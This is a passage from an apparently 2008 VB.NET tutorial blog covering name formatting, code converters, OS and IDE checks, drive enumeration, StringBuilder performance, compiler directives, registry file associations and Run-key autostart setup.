  Public Sub New(ByVal FirstName As String, ByVal LastName As String)
    ' Initialize class
    _FirstName = FirstName
    _LastName = LastName

  End Sub

  Public Property FirstName() As String
    '
    Get
      Return _FirstName
    End Get
    Set(ByVal value As String)
      _FirstName = value
    End Set

  End Property

  Public Property LastName() As String
    Get
      Return _LastName
    End Get
    Set(ByVal value As String)
      _LastName = value
    End Set

  End Property

  Public Overrides Function ToString() As String
    ' Return name as a string
    Dim TempStr As String

    TempStr = ""
    If _FirstName.Length > 0 Then
      TempStr = _FirstName
    End If
    If _LastName.Length > 0 Then
      If TempStr.Length > 0 Then
        ' Add space between names
        TempStr = TempStr & " " & _LastName
      Else
        TempStr = _LastName
      End If
    End If
    Return TempStr

  End Function

  Public Overloads Function ToString(ByVal Format As String) As String
    ' Return name as a string
    ' Format="f", "l", "fl", "lf", "f,l", "l,f"
    Dim TempStr As String

    TempStr = ""
    Select Case Format
      Case "f"
        TempStr = _FirstName
      Case "l"
        TempStr = _LastName
      Case "fl"
        If _FirstName.Length > 0 Then
          TempStr = _FirstName
        End If
        If _LastName.Length > 0 Then
          If TempStr.Length > 0 Then
            ' Add space between names
            TempStr = TempStr & " " & _LastName
          Else
            TempStr = _LastName
          End If
        End If
      Case "lf"
        If _LastName.Length > 0 Then
          TempStr = _LastName
        End If
        If _FirstName.Length > 0 Then
          If TempStr.Length > 0 Then
            ' Add space between names
            TempStr = TempStr & " " & _FirstName
          Else
            TempStr = _FirstName
          End If
        End If
      Case "f,l"
        If _FirstName.Length > 0 Then
          TempStr = _FirstName
        End If
        If _LastName.Length > 0 Then
          If TempStr.Length > 0 Then
            ' Add space between names
            TempStr = TempStr & ", " & _LastName
          Else
            TempStr = _LastName
          End If
        End If
      Case "l,f"
        If _LastName.Length > 0 Then
          TempStr = _LastName
        End If
        If _FirstName.Length > 0 Then
          If TempStr.Length > 0 Then
            ' Add space between names
            TempStr = TempStr & ", " & _FirstName
          Else
            TempStr = _FirstName
          End If
        End If
    End Select
    Return TempStr

  End Function

End Class

The first ToString method has to be declared as Overrides, since the class is inherited from System.Object and the method overrides the method from the base class.

The second ToString method accepts a format string argument and it has to be declared as Overloads, since it overloads our first method. Accepted format strings are "f", "l", "fl", "lf", "f,l" and "l,f" and they affect if either first or the last name is outputted first and how they are separated.

The following example shows, how to test ToString methods and how the output from the our custom ToString method is formatted.

Dim aPersonName As New PersonName("John", "Doe")
MessageBox.Show(aPersonName.ToString, _
  "Name", MessageBoxButtons.OK, MessageBoxIcon.Information)
MessageBox.Show(aPersonName.ToString("f"), _
  "Name", MessageBoxButtons.OK, MessageBoxIcon.Information)
MessageBox.Show(aPersonName.ToString("l"), _
  "Name", MessageBoxButtons.OK, MessageBoxIcon.Information)
MessageBox.Show(aPersonName.ToString("fl"), _
  "Name", MessageBoxButtons.OK, MessageBoxIcon.Information)
MessageBox.Show(aPersonName.ToString("lf"), _
  "Name", MessageBoxButtons.OK, MessageBoxIcon.Information)
MessageBox.Show(aPersonName.ToString("f,l"), _
  "Name", MessageBoxButtons.OK, MessageBoxIcon.Information)
MessageBox.Show(aPersonName.ToString("l,f"), _
  "Name", MessageBoxButtons.OK, MessageBoxIcon.Information)

And the resulting output is

John Doe
John
Doe
John Doe
Doe John
John, Doe
Doe, John

Convert CSharp source code to VB.NET source code

2008-11-13T04:02:00.001-08:00

Occasionally you search for code samples or code snippets for a specific problem with the search engines. Usually you do find a code snippet but it is written in a "wrong" language, most notably with C#. Then you face the problem, how to convert C# code to VB.NET code. Of course, you can do it manually if you're CSharp literate.

Fortunately there are a few options to translate C# source code to VB.NET automatically and for free. Translators can be divided in two categories, web-based translators and applications that are capable to do the conversion. The pros of the web-based translators are obvious, you don't need to install any additional applications to your computer.

There are a few things to remember when using .NET code translators. Although the original source code might be fully tested, you need to re-test the translated code. There's always some code which can't be translated, at least correctly.

Here's a few rules of thumb to get most of the code converters. Do not try to translate a whole application. The result may be hard to test and the resulted source code may be more or less spaghetti style code. Keep it simple, translate only code snippets or one class at a time.

Finally, code translators usually work in both ways i.e. they translate from CSharp to VB.NET as well as from VB.NET to CSharp.

Web-based CSharp to VB.NET converters

http://www.carlosag.net/Tools/CodeTranslator/ is an on-line translator by Carlos Mares. Supported translations are C# -> VB.NET and VB.NET -> C#. As usually, the code is pasted in the text box and then you press Go-button. The translated code is replaced in the text box. Extra option is to upload a whole file to be translated.

http://www.developerfusion.com/tools/convert/csharp-to-vb/ is an on-line translator by Developer Fusion Ltd. Supported translations are C# -> VB.NET and VB.NET -> C#. Also .NET 3.5 syntax is supported. Extra feature is automatically copy result to clipboard. Developer Fusion's translator gives accurate information if the original source has error. It also gives information about the code parts that are not supported in the target language and thus are not possible to translate.

http://converter.telerik.com/ is an on-line translator by Telerik. Supported translations are C# -> VB.NET and VB.NET -> C#. Like Developer Fusion's translator, this translator gives accurate information if the original source has error. Translator also gives information about the code parts that are not supported in the target language and thus are not possible to translate.

A good list of translators, both free and commercial, can be found on Converting code between .NET programming languages
Converters mentioned above are just samples, new converts seem to arise in the net almost daily.

CSharp to VB.NET converter applications

SharpDevelop (http://www.sharpdevelop.net/) is actually an IDE for .NET programming. In the Tools-menu you'll find "Covert code to"-option. Supported translations are C# -> VB.NET, VB.NET -> C# and a conversions to a bit exotic Boo-language. As you can expect, you'll get messages from syntax errors in the original code. Also code parts that are not supported in the target language are marked with comments. Current SharpDevelop version is 2.2, but version 3.0 is in the beta phase and it will propably support .NET 3.5 syntax.

.NET Reflector (http://www.red-gate.com/products/reflector/) is a tool to view, navigate, and search through, the class hierarchies of .NET assemblies. .NET Reflector was originally programmed by Lutz Roeder but Red Gate Software Ltd. acquired it this year. They still offer a free version of it. Since Reflector handles assemblies rather than source code, it supports quite wide range of conversions. Easiest way to convert from the assembly to source code, is to use a suitable plug-in for the Reflector. In the case of VB.NET conversion, Denis Bauer has a great plug-in for this www.denisbauer.com/NETTools/FileDisassembler.aspx. Supported conversions i.e. source languages generated with this plug-in are C#, Visual Basic and Delphi. Latest version is 5.0.42.0 and it was published in 2007 so there's no .NET 3.5 support.

Which CSharp to VB.NET source code converter to choose from?

My personal favorite is Developer Fusion's translator since I convert often and small C# snippets to VB.NET. I've always got the job done with it and it's fast to use. However, take a look at the other converters too. You may find a more suitable for your needs.

A quick tip: Check with VB.NET if operating system is Windows Vista

2008-11-06T01:57:00.001-08:00

One day I fixed some old VB.NET application that works fine in Windows XP and Windows 2000. The problem was, it didn't work as expected with Windows Vista.

I located the spot which handled Windows registry in a way that did not work in Vista and I was quickly able to write a Vista-compatible version. Since it was not possible to have two versions of the application and I did not have time to re-write that part of the code to be compatible with all Windows versions, I decided to include both code snippets in the same version and just check operating system.

Checking operating system version with VB.NET is an easy job and I wrote a little wrapper for my Windows Vista check:

''' <summary>
''' Returns true if the OS version is any Vista version
''' </summary>
''' <returns>True if Vista OS</returns>
''' <remarks></remarks>
Public Function IsVista() As Boolean
  '
  If Environment.OSVersion.Version.Major = 6 Then
    Return True
  Else
    Return False
  End If

End Function

In the application I use it in the following way:

If IsVista() Then
  ' Vista specific code
Else
  ' Code for older Windows versions
End If

That saved me a lot of time and testing.

Check with VB.NET if running under IDE

2008-10-03T03:53:00.001-07:00

When you write your VB.NET application and debug it under IDE, you know it's running under IDE. Your application does not know it but in some cases it should know that it's running under IDE.

When the application can check if it's running under IDE or as a standalone application, it can make different decisions based on that knowledge.

One scenario would be to use different paths to data files. Under IDE the application can use path to some data made for debugging purpose. When running as a standalone application it can use path to real data.

Another scenario where your application can use this information, is to display debugging information. When you debug application under IDE, it can use extensive debug information dumping. But when you hand your application over to testers, they like to have your application behaving like end users would see it.

Test with VB.NET if running in IDE

With VB.NET it's quite simple to test if the application runs in IDE. System.Diagnostics namespace contains Debugger class. From Debugger class you can check IsAttached property which tells if a debugger is attached to the running process. This is the case when your application runs in IDE.

''' <summary>
''' Returns boolean value telling if the application is running under IDE
''' </summary>
''' <returns>True if the application is running under IDE</returns>
''' <remarks></remarks>
Public Function RunningUnderIDE() As Boolean
  '
    Return System.Diagnostics.Debugger.IsAttached()

End Function

Test with Visual Basic 6 if running under IDE

Just for the comparison I went through my "Old Code Archive" and under the dust I found how the same test was done with VB6. I have used this code to test if my application was running in IDE with VB6, but I know there were other (maybe simpler) ways to do it.

First, some helper routines and declarations.

Const FileFromFullName = 2

Private Declare Function GetModuleFileName Lib "kernel32" _
  Alias "GetModuleFileNameA" (ByVal hModule As Long, _
  ByVal lpFileName As String, ByVal nSize As Long) As Long
  
Private Declare Function GetModuleHandle Lib "kernel32" Alias _
  "GetModuleHandleA" (ByVal lpModuleName As String) As Long

Private Function GetFileFromFullName(ByVal SourceFile As String) As String
'
' Return the file name and extension part of SourceFile.
'
Dim SlashPos As Integer
Dim LastPos As Integer
  
  ' Find out the position index for the last slash character (LastPos)
  SlashPos = InStr(SourceFile, "\")
  LastPos = SlashPos
  Do Until SlashPos = 0
    SlashPos = InStr(LastPos + 1, SourceFile, "\")
    If SlashPos <> 0 Then
      LastPos = SlashPos
    End If
  Loop
  
  ' Now return last 'LastPos' chars from the original SourceFile string
  GetFileFromFullName = Mid$(SourceFile, LastPos + 1)

End Function

Public Function GetProcessName() As String
Attribute GetProcessName.VB_Description = "Returns the name of the mother process, which is different to app.name if program is a dll."
'
' Returns the name of the mother process (different to app
' if we are in a dll)
'
Dim StringBuffer As String
Dim FileName As String
Dim Length As Long
  
  StringBuffer = Space(255)
  Length = GetModuleFileName(GetModuleHandle(vbNullString), _
    StringBuffer, Len(StringBuffer))
  FileName = GetFileFromFullName(Left$(StringBuffer, Length))
  FileName = Left$(FileName, Len(FileName) - 4) ' Remove .exe
  GetProcessName = FileName

End Function

And finally the actual function.

Public Function RunningUnderIDE() As Boolean
Attribute RunningUnderIDE.VB_Description = "Returns boolean value telling if program is running under IDE. False means that program is compiled version."
'
' Returns boolean value telling if we are running under IDE
' (False means we are running the compiled version)
'
  RunningUnderIDE = (GetProcessName <> App.EXEName)

End Function

Well, it worked but that's a quite lot more code than in VB.NET version.

Get disk drive type with VB.NET

2008-09-29T04:35:00.001-07:00

Sometimes you have to find disk drives of particular type. For example, you may have to search all removable disk drives or network mapped drives with VB.NET.

This sample shows how to check all drives and get their drive type, volume label and check if the drive is ready.

First, create a new standard WinForms project. Drop in a one button control and a one listbox control.

Import System.IO namespace

Imports System.IO

and then add the following declaration and helper procedure after form's declaration

Public Declare Function WNetGetConnection Lib "mpr.dll" Alias "WNetGetConnectionA" _
 (ByVal lpszLocalName As String, ByVal lpszRemoteName As String, ByRef cbRemoteName As Integer) As Integer

Public Function GetNetDriveName(ByVal DriveLetter As String) As String
  '
  ' Return mapped drive UNC name
  Dim RetVal As Integer
  Dim OutName As String = New String(CChar(" "), 260)
  Dim NameLength As Integer = 260

  Try
    RetVal = WNetGetConnection(DriveLetter, OutName, NameLength)
    OutName = OutName.Replace(Chr(0), " ").TrimEnd(CChar(" "))
    Return OutName
  Catch ex As Exception
    Return ""
  End Try

End Function

Mpr.dll is a Windows module which handles communication with installed networked providers. In this case its used in the helper function above to get UNC-name for mapped network drives.

Next is the actual procedure which loops drive letters and returns available information.

Public Sub GetDrives(ByRef DriveLetter() As String, ByRef VolumeLabel() As String, _
  ByRef DriveTypeVal() As DriveType, ByRef PathToDrive() As String, _
  ByRef IsDriveReady() As Boolean)
  '
  ' Return available disc drives
  '
  Const DRIVELETTERS As String = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
  Dim Info As DriveInfo
  Dim Count As Integer
  Dim i As Integer

  Try
    Count = DRIVELETTERS.Length - 1
    ReDim DriveLetter(Count)
    ReDim VolumeLabel(Count)
    ReDim DriveTypeVal(Count)
    ReDim PathToDrive(Count)
    ReDim IsDriveReady(Count)
    For i = 0 To Count
      DriveLetter(i) = DRIVELETTERS.Substring(i, 1)
      VolumeLabel(i) = ""
      DriveTypeVal(i) = DriveType.Unknown
      PathToDrive(i) = ""
      IsDriveReady(i) = False
    Next i
    For Each Info In My.Computer.FileSystem.Drives
      Count = DRIVELETTERS.IndexOf(Info.RootDirectory.FullName.Substring(0, 1))
      DriveTypeVal(Count) = Info.DriveType
      If Info.IsReady Then
        IsDriveReady(Count) = True
        VolumeLabel(Count) = Info.VolumeLabel
      Else
        IsDriveReady(Count) = False
        VolumeLabel(Count) = ""
      End If
      If Info.DriveType = DriveType.Network Then
        PathToDrive(Count) = GetNetDriveName(DriveLetter(Count) & ":")
      Else
        PathToDrive(Count) = DriveLetter(Count) & ":"
      End If
    Next Info
  Catch ex As Exception
    ' Error handling
  End Try

End Sub

And finally here's the code for Button1. The code call GetGrives-procedure and displays returned information in the ListBox1.

Private Sub Button1_Click(ByVal sender As Object, ByVal e As System.EventArgs) Handles Button1.Click
  '
  ' Get drives and their types
  Dim DriveLetter() As String
  Dim VolumeLabel() As String
  Dim DriveTypeVal() As DriveType
  Dim PathToDrive() As String
  Dim IsDriveReady() As Boolean
  Dim TempStr As String
  Dim i As Integer

  Try
    ReDim DriveLetter(0)
    ReDim VolumeLabel(0)
    ReDim DriveTypeVal(0)
    ReDim PathToDrive(0)
    ReDim IsDriveReady(0)
    GetDrives(DriveLetter, VolumeLabel, DriveTypeVal, PathToDrive, IsDriveReady)
    ListBox1.Items.Clear()
    TempStr = "DriveLetter" & "; "
    TempStr = TempStr & "DriveType" & "; "
    TempStr = TempStr & "VolumeLabel" & "; "
    TempStr = TempStr & "PathToDrive" & "; "
    TempStr = TempStr & "IsDriveReady"
    ListBox1.Items.Add(TempStr)
    For i = 0 To DriveLetter.GetUpperBound(0)
      TempStr = DriveLetter(i) & "; "
      TempStr = TempStr & DriveTypeVal(i).ToString & "; "
      TempStr = TempStr & VolumeLabel(i) & "; "
      TempStr = TempStr & PathToDrive(i) & "; "
      TempStr = TempStr & IsDriveReady(i).ToString
      ListBox1.Items.Add(TempStr)
    Next i
  Catch ex As Exception
    ' Error handling
  End Try

End Sub

The output looks something like this:

DriveLetter; DriveType; VolumeLabel; PathToDrive; IsDriveReady
A; Removable; ; A:; False
B; Unknown; ; ; False
C; Fixed; ; C:; True
D; Fixed; New Volume; D:; True
E; CDRom; ; E:; False
F; Fixed; HD-HCU2; F:; True
G; Fixed; HD-HSU2; G:; True
H; Fixed; MAXTOR; H:; True
I; Removable; PORTABLEAPP; I:; True
J; Unknown; ; ; False
K; Unknown; ; ; False
L; Unknown; ; ; False
M; Unknown; ; ; False
N; Unknown; ; ; False
O; Unknown; ; ; False
P; Unknown; ; ; False
Q; Unknown; ; ; False
R; Unknown; ; ; False
S; Unknown; ; ; False
T; Unknown; ; ; False
U; Unknown; ; ; False
V; Unknown; ; ; False
W; Unknown; ; ; False
X; Unknown; ; ; False
Y; Unknown; ; ; False
Z; Network; Vista; \\Cameron\Public; True

The listing shows that drive A is a removable disk but its not ready (it's a floppy disk drive). Drives C, D, F, G and H are hard disk drives and drive C has no volume label. Drive E is a CD/DVD drive and drive I is also a removable drive (USB memory stick). And finally drive Z is a network mapped drive.

What can you do and do not with this information? First, the only USB drive is drive I because drive letters A and B are assigned to floppy disks even if you do not have one. Second, drive Z's volume label is "Vista" in the PC from which it is shared. The share name is \\Cameron\Public so the server's name is "Cameron" and the shared folder is "Public".

And there's a few things you won't get with this code. First, only two of the five fixed disk drives are internal drives and three drives are external had disk drives, but you can't tell which. At least for sure. Second, drive E is of type "CDRom" but it is actually a writable CD/DVD combo drive. But again, you can't tell the difference with this code.

Do more with DriveInfo class

Now that you know how to get this information. you may experience other properties that DriveInfo class offers. Here's a list of a few interesting properties:

Info.AvailableFreeSpace
Info.DriveFormat
Info.Name
Info.TotalFreeSpace
Info.TotalSize

Get drives of particular type with Visual Basic.NET

Here is a slight modification to the code above to make it more practical to use in VB.NET. This code gets the required drive type as parameter and returns only matching drives, if any. You may use this code to get only USB memory drives or network mapped drives for example.

Public Sub GetDrivesOfType(ByRef VolumeLabel() As String, _
  ByRef PathToDrive() As String, ByRef IsDriveReady() As Boolean, _
  ByVal DriveTypeVal As DriveType)
  '
  ' Return drives of given type
  Dim Info As DriveInfo
  Dim ThisLetter As Char
  Dim Count As Integer

  Try
    Count = 0
    For Each Info In My.Computer.FileSystem.Drives
      If Info.DriveType = DriveTypeVal Then
        ReDim Preserve VolumeLabel(Count)
        ReDim Preserve PathToDrive(Count)
        ReDim Preserve IsDriveReady(Count)
        ThisLetter = CChar(Info.RootDirectory.FullName.Substring(0, 1))
        If Info.IsReady Then
          IsDriveReady(Count) = True
          VolumeLabel(Count) = Info.VolumeLabel
        Else
          IsDriveReady(Count) = False
          VolumeLabel(Count) = ""
        End If
        If Info.DriveType = DriveType.Network Then
          PathToDrive(Count) = GetNetDriveName(ThisLetter & ":")
        Else
          PathToDrive(Count) = ThisLetter & ":"
        End If
        Count += 1
      End If
    Next Info
  Catch ex As Exception
    ' Error handling
  End Try

End Sub

and you call this procedure:

ReDim VolumeLabel(0)
ReDim PathToDrive(0)
ReDim IsDriveReady(0)
GetDrivesOfType(VolumeLabel, PathToDrive, IsDriveReady, DriveType.Removable)

to get all removable drives. If you want to get only USB memory sticks, remember that drives A and B are floppy disks. The output, if you use similar ListBox output as above, would look like this:

VolumeLabel; PathToDrive; IsDriveReady
; A:; False
PORTABLEAPP; I:; True

So, the only USB stick drive would have a drive letter "I".

Concatenate strings in VB.NET

2008-09-24T03:25:00.001-07:00

VB.NET introduced a new way to concatenate strings, StringBuilder class. In VB.NET strings are immutable. This means that once a string is created its value can not be changed. So when your code concatenates strings, the strings themselves pointed by a string variable does not change. Instead a new string object is created and the string variable starts to reference this new string object.

Does this make any difference when concatenating strings in VB.NET code? Not really if you have a simple: MyString = "Hello " & "world!". But things get quite different when your code concatenates strings inside loops or you have otherwise excessive string manipulation in your code.

Concatenate strings with & -operator

Here's a simple procedure that makes concatenation in a loop with & -operator and finally shows elapsed time. Notice that the timing is done in a simple way. The timing in itself is not precise but enough to show the difference between two ways to concatenate strings.

Imports System.Text

''' <summary>
''' Concatenate strings with &amp; -operator
''' </summary>
''' <remarks></remarks>
Public Sub ConcatenateString()
  '
  Dim StartTime As DateTime
  Dim Elapsed As Double
  Dim ResultString As String
  Dim TempStr As String
  Dim i As Integer

  ResultString = ""
  TempStr = "Lorem ipsum dolor sit amet, consectetuer adipiscing elit."
  StartTime = System.DateTime.Now
  For i = 0 To 9999
    ResultString = ResultString & "Line " & i & " " & TempStr & Environment.NewLine
  Next i
  Elapsed = System.DateTime.Now.Subtract(StartTime).TotalMilliseconds
  MessageBox.Show("Elapsed time " & Elapsed.ToString & " ms with & -operator", _
    "Elapsed Time", _
    MessageBoxButtons.OK, _
    MessageBoxIcon.Information)

End Sub

and the result is

Concatenate strings with StringBuilder class

Below is the same procedure as above. Now the concatenation of the strings is done with the StringBuilder object.

Imports System.Text

''' <summary>
''' Concatenate strings with StringBuilder
''' </summary>
''' <remarks></remarks>
Public Sub ConcatenateStringBuilder()
  '
  Dim StartTime As DateTime
  Dim Elapsed As Double
  Dim ResultString As String
  Dim TempStr As String
  Dim oStrBuilder As StringBuilder
  Dim i As Integer

  ResultString = ""
  TempStr = "Lorem ipsum dolor sit amet, consectetuer adipiscing elit."
  oStrBuilder = New StringBuilder()
  StartTime = System.DateTime.Now
  For i = 0 To 9999
    oStrBuilder.Append("Line ")
    oStrBuilder.Append(i)
    oStrBuilder.Append(" ")
    oStrBuilder.Append(TempStr)
    oStrBuilder.Append(Environment.NewLine)
  Next i
  ' Move the result to ResultString variable
  ResultString = oStrBuilder.ToString
  Elapsed = System.DateTime.Now.Subtract(StartTime).TotalMilliseconds
  MessageBox.Show("Elapsed time " & Elapsed.ToString & " ms with StringBuilder", _
    "Elapsed Time", _
    MessageBoxButtons.OK, _
    MessageBoxIcon.Information)

End Sub

and now the result is

Conclusions

In the codes above the difference between methods was 17.5 seconds versus 0.015 seconds. So the conclusion is clear, StringBuilder class gave over 1 000 times faster results than & -operator. When your code concatenates strings inside loops or you have otherwise excessive string manipulation, use StringBuilder class to get most of your application. But as I stated in the beginning of this post, & -operator is still useful. Using StringBuilder class in each and every simple concatenation of the strings would be an overkill.

But there's much more in StringBuilder class than just concatenating strings. Check Microsoft's reference for a complete list of the features StringBuilder class has to offer.

Using compiler directives with VB.NET

2008-09-22T04:43:00.001-07:00

With VB.NET Microsoft introduced compiler directives to Visual Basic language. Compiler directives have been around for a long time in other languages and compilers and now they are also part of Visual Basic.

There are four compiler directives in VB.NET:

#Const directive
#ExternalSource directive
#If...Then...#Else directive
#Region directive

ExternalSource directive

Directive is used for mapping between specific lines of source code and external source text. See Microsoft's reference for information about this directive.

Region directive

With #Region "name"...#End Region directive you can organize source code to the blocks in the editor. These blocks have "+"-sign to "open" the block and "-"-sign to "hide" the block. When a block is hidden, only the "+"-sign followed by region's name are visible. This is very handy if the source file is long. You can put for example all helper routines to "helper"-region and form's event handlers to "form"-region. When blocks are collapsed, all you see is "helper" and "form" titles instead of lots of source code.

Const directive

This directive is commonly used in conjunction with #If directive. With #Const directive you can assign compiler variables which you can test with #If...Then...#Else directive.

#Const directives can be set from Project Properties to be global constants i.e. they are available in all project's modules. However, this is not possible with VB.NET Express Edition. If you are using Express Edition, #Const directive is only available in the module where it is defined.

If...Then...Else directive

#If...Then...#Else directive is the most flexible and the most useful VB.NET compiler directive. Below are a few samples for what you can do with this directive.

Conditional compiling:

#Const TargetOS = "Vista"

#If TargetOS = "Vista" Then
   ' Windows Vista specific code
#ElseIf TargetOS = "WinXP" Then
   ' Windows XP specific code
#Else
   ' Code for other OS
#End if

With conditional compiling you can write operating system, processor specific or other target platform specific code to the same source file. Changing #Const directive value and recompiling code gives you platform specific executables without maintaining multiple source codes for the same application.

Simple localization:

#Const Language = "French"

#If Language = "French" Then
   ' Show message to user in French
#Else
   ' Show message to user in English
#End if

If you have a simple user interface in your application or otherwise do not need a full localization, you can make a simple localization with conditional compiling.

Debugging code in source code:

#Const DebugMode = True

Public Sub DoSomething(ByVal ArgNumber As Integer)
#If DebugMode = True Then
  Debug.WriteLine("Entered sub DoSomething with argument: " & ArgNumber)
#End If
  ' Rest of procedure code

End Sub

When you are on the development and coding phase of the application, you usually have more or less code for debugging purpose. Debugging code is something that you must never leave in the final production code. And debug dumps are something that your customers should never see. Again, conditional compiling is an easier solution than maintaining multiple source codes for the same application.

Get default application in Windows XP or Vista with VB.NET

2008-09-19T05:33:00.001-07:00

When you double click a file, Windows Explorer opens it with associated default application. Windows Explorer determines current default application with file's extension and with information that is stored in the Windows registry. Obtaining the default application with VB.NET is not a difficult task. Default application can be found in both Windows XP and Windows Vista with the same VB.NET code.

Windows stores known file extensions in HKEY_CLASSES_ROOT registry hive. So, the first thing is to check if file extension exists in the registry. If the file extension exists, it has a so called ProgID associated with it. For example, file extension ".txt" has a ProgID "txtfile". Next step is to locate this ProgID registry key and check if it has a sub key "\shell\open\command". This sub key contains finally the path and the name of the default application. In the case of "txtfile" registry key, the default application could be "%SystemRoot%\system32\NOTEPAD.EXE %1".

The VB.NET function below returns the name of the default application, if it exists. Additionally it returns a ready-to-execute string which can be used with VB.NET's Shell command. First parameter in the function is a parameter string for default application. Second parameter is the actual file extension we are searching for.

''' <summary>
''' Return registered application by file's extension
''' </summary>
''' <param name="ParamFileName">Parameter for ShellAppName</param>
''' <param name="FileExtension">File extension</param>
''' <param name="AppName">Returns application name if any</param>
''' <param name="ShellAppName">Returns a string with application name and file name as its parameter</param>
''' <returns>True if the default application for this file type was found</returns>
''' <remarks>This function is Windows XP and Vista compatible</remarks>
Public Function GetRegisteredApplication(ByVal ParamFileName As String, ByVal FileExtension As String, _
 ByRef AppName As String, ByRef ShellAppName As String) As Boolean
 '
 ' Return registered application by file's extension
 '
 Dim StrExt As String
 Dim StrProgID As String
 Dim StrExe As String
 Dim oHKCR As RegistryKey ' HKEY_CLASSES_ROOT
 Dim oProgID As RegistryKey
 Dim oOpenCmd As RegistryKey
 Dim TempPos As Integer

 Try
   ' Add starting dot to extension
   StrExt = "." & FileExtension
   ' Get Programmatic Identifier for this extension
   Try
     oHKCR = Registry.ClassesRoot
     oProgID = oHKCR.OpenSubKey(StrExt)
     StrProgID = oProgID.GetValue(Nothing).ToString
     oProgID.Close()
   Catch
     ' No ProgID, return false
     Return False
   End Try
   ' Get associated application
   Try
     oOpenCmd = oHKCR.OpenSubKey(StrProgID & "\shell\open\command")
     StrExe = oOpenCmd.GetValue(Nothing).ToString
     oOpenCmd.Close()
   Catch
     ' Missing default application
     Return False
   End Try
   TempPos = StrExe.IndexOf(" %1")
   If TempPos > 0 Then
     ' Replace %1 placeholder with ParamFileName
     StrExe = StrExe.Substring(0, TempPos)
     AppName = StrExe
     StrExe = StrExe & " " & Convert.ToChar(34) & ParamFileName & Convert.ToChar(34)
     ShellAppName = StrExe
   Else
     ' No %1 placeholder found, append ParamFileName
     AppName = StrExe
     ShellAppName = StrExe & " " & Convert.ToChar(34) & ParamFileName & Convert.ToChar(34)
   End If
   Return True
 Catch ex As Exception
   Return False
 End Try

End Function

The function returns value True if the default application was found. If the function returns False, there was some error or some issue with registry permissions. In the latter case see System.Security.AccessControl namespace. That namespace provides methods to handle permission issues and how to set registry permissions.

To test this function, here's a code snippet for testing purpose. First create a new text file to C-drives root and name it "test.txt". When you run this snippet, it opens "test.txt" file with Notepad and displays message box:

This is, if you have Notepad as your default text editor.

Dim ApplicationName As String
Dim ShellApplicationName As String
Dim FileExtension As String
Dim ParamFileName As String

ApplicationName = ""
ShellApplicationName = ""
FileExtension = "txt"
ParamFileName = "C:\test.txt"
If GetRegisteredApplication(ParamFileName, FileExtension, ApplicationName, ShellApplicationName) Then
 Shell(ShellApplicationName)
 MessageBox.Show("Default application for the files of type '" & FileExtension & "'" & _
   " is '" & ApplicationName & "'", _
   "Default Application", _
   MessageBoxButtons.OK, _
   MessageBoxIcon.Exclamation)
Else
 MessageBox.Show("No default application found for the files of type '" & FileExtension & "'", _
   "Default Application", _
  MessageBoxButtons.OK, _
  MessageBoxIcon.Exclamation)
End If

Final words of warning. Always be careful when handling registry with your application. I have tested and used this code, and it does only read from the registry. But I will not give any kind of warranty if your registry gets messed up. So backup your registry first or otherwise make sure that you can restore your system if something goes wrong. You use this code totally at your own risk!

Make VB.NET application to start up from registry

2008-09-16T07:12:00.001-07:00

There are basically two ways to start application when Windows starts. First and maybe the easiest way is to copy a shortcut to your application in Startup folder. Second way is to start up VB.NET application from the Windows registry.

Some installer applications can do this for you. But if you want to give users the option not to start application when Windows starts, you have to deal application starting programmatically.

Also, you have to make the decision if the application starts always when the Windows starts or if it starts only for the current user. The code below has a parameter which allows you to choose, which way the application starts.

A few words of warning. Always be careful when changing registry with your application. I have tested and used the code below. But I will not give any kind of warranty if your registry gets messed up. So backup your registry first or otherwise make sure that you can restore your system if something goes wrong. You use this code totally at your own risk!

Start application from the registry

Starting your VB.NET application from the registry is done by adding it to either HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry hive or HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry hive.

Imports Microsoft.Win32

''' <summary>
''' Installs an application to start from the registry when Windows starts
''' </summary>
''' <param name="AppName">Application's name</param>
''' <param name="AppPath">Full path to the application</param>
''' <param name="InstallToLocalMachine">Install to LM, otherwise install to current user</param>
''' <returns>True if successfully installed</returns>
''' <remarks>Compatible with Windows XP and Vista</remarks>
Public Function StartUpInstall(ByVal AppName As String, ByVal AppPath As String, _
 ByVal InstallToLocalMachine As Boolean) As Boolean
 '
 ' Install to registry
 ' If LM then uses HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 ' Otherwise uses HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 '
 Dim RegRoot As RegistryKey
 Dim RegKey As RegistryKey

 Try
   If InstallToLocalMachine Then
     RegRoot = Microsoft.Win32.Registry.LocalMachine
     RegKey = RegRoot.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
       RegistryKeyPermissionCheck.ReadWriteSubTree, _
       Security.AccessControl.RegistryRights.SetValue)
     RegKey.SetValue(AppName, AppPath, RegistryValueKind.String)
     Return True
   Else
     RegRoot = Microsoft.Win32.Registry.CurrentUser
     RegKey = RegRoot.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
       RegistryKeyPermissionCheck.ReadWriteSubTree, _
       Security.AccessControl.RegistryRights.SetValue)
     RegKey.SetValue(AppName, AppPath, RegistryValueKind.String)
     Return True
   End If
 Catch ex As Exception
   Return False
 End Try

End Function

If everything goes right, the function returns True. Otherwise operation failed. The most common reason for failure is inadequate permissions to modify the registry.

Removing application from registry

If you do not want to start the application from the registry it can be done simply by deleting application's entry from the registry.

Imports Microsoft.Win32

''' <summary>
''' Uninstalls an application not to start from the registry when Windows starts
''' </summary>
''' <param name="AppName">Application's name</param>
''' <param name="InstallToLocalMachine">Uninstall from LM, otherwise uninstall from current user</param>
''' <returns>True if successfully uninstalled</returns>
''' <remarks>Compatible with Windows XP and Vista</remarks>
Public Function StartUpUnInstall(ByVal AppName As String, _
 ByVal InstallToLocalMachine As Boolean) As Boolean
 '
 ' Uninstall from registry
 ' If LM then uses HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 ' Otherwise uses HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 '
 Dim RegRoot As RegistryKey
 Dim RegKey As RegistryKey

 Try
   If InstallToLocalMachine Then
     RegRoot = Microsoft.Win32.Registry.LocalMachine
     RegKey = RegRoot.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
       RegistryKeyPermissionCheck.ReadWriteSubTree, _
